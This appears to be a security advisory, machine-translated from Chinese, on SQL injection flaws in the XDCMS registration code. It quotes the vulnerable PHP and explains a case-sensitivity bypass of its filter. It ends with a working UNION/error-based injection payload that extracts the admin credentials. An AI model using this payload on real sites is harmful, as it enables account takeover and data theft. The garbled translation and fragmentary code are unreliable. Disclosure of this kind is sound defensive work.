xdcms a registered user of the SQL injection vulnerability analysis-vulnerability warning-the black bar safety net

ID MYHACK58:62201441641
Type myhack58
Reporter xfkxfk
Modified 2014-01-03T00:00:00


The latest version XDCMS enterprise management system, since the filter is not strict, you can bypass the limit, resulting in a number ofSQL injection

Injection in XDCMS enterprise management system registration function, see\system\modules\member\index. php file:

Registration will be called register_save, the problem lies in the index. php register_save function:

public function register_save(){

$username=safe_html($_POST['username']);//get the UserName, here safe_html function to filter







if(! strlength($username,5)){

showmsg(C('username'). C('str_len_error').' 5','-1');


if(! strlength($password,5)){

showmsg(C('password'). C('str_len_error').' 5','-1');


if($password!=$ password2){




$user_num=$this->mysql->num_rows("select * from ". DB_PRE."member where username='$username'");//determine whether the members present, where the UserName may be bypassing the filter, causing the injection, this is the first of theSQL injection





$this->mysql->db_insert('member',"username='".$ username."',password='".$ password."',creat_time='". datetime()."',last_ip='".$ ip."',is_lock='0',logins='0',groupid='1'");//Insert the main fields-Username, Password, where the UserName agreed to cause injection, the second atsql injection


//Insert the Subsidiary field


foreach($fields as $k=>$v){





$field_sql.=",{$k}='{$f_value}'";//here there is no filter, directly into the following update sql statement, resulting in a third placesql injection



$field_sql="update ". DB_PRE."member set {$field_sql} where userid={$last_id}";


showmsg(C('register_success'),'index. php? m=member&f=register');


The first of thesql injection, the registration of a user, and then the capture of:

Finally look at the results, and successfully got the management Username Password:

In the safe_html at although had aSQL injectionis sensitive to the word, and also filter=and, but did not considerSQL injectionsensitive to the word case, where the only filter lowercase, so we use uppercase to bypass, and here the filter of=and, we can use without the*and the=conventional saveSQL injectionstatement, EXP is as follows:

In the UserName at the input:

‘ UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM (SELECT

count(1),concat(round(rand(0)),(SELECT concat(username,0×2 3,password) FROM

c_admin LIMIT 0,1))a FROM information_schema. tables GROUP by a)b#

Author: xfkxfk